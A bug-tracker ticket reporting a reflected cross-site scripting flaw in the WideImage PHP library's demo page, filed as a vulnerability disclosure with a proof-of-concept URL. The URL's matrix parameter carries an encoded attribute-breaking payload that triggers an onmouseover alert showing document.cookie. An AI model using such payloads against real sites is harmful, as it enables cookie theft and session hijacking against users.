WideImage PHP library is vulnerable to Reflected XSS Attack

Status: Abandoned

Brought to you by: gasper_k

#42 WideImage PHP library is vulnerable to Reflected XSS Attack

Milestone: v11.02.19

Status: open

Owner: Gasper Kozak

Labels: xss (1) reflected xss (1) cross site scripting (1)

Priority: 5

Updated: 2015-07-04

Created: 2015-07-04

Creator: Mohammad Sikkandar Sha

Private: No

Date: 04/July/2015

Discovered by: Mohammad Sikkandar Sha

Contact Email: sikkandar.lynx@gmail.com

Type of vulnerability: Reflected XSS

Tested on: Windows 8.1

Product: WideImage - An Open Source PHP library for image manipulation.

Version: 11.02.19

Release Date: February 19, 2011

Description: PHP library is vulnerable to Reflected XSS Attack on page -

URL -
http://localhost:8080/vendor/wideimage/demo/?colors=255&demo=applyConvolution&dither=1&dither_cb=1&div=1&match_palette=1&match_palette_cb=1&matrix=2%25200%25200%252c%25200%2520-1%25200%252c%25200%25200%2520-1%22%20onmouseover%3dalert%28document.cookie%29%20bad%3d%22&offset=220&output=preset%20for%20demo

Notified Vendor: July 04, 2015
Response:
Closure:

--
Regards,
Md. Sikkandar Sha

2 Attachments

Reflected_XSS_WideImage.JPG

Reflected_XSS_WideImage_2.JPG

Discussion

Log in to post a comment.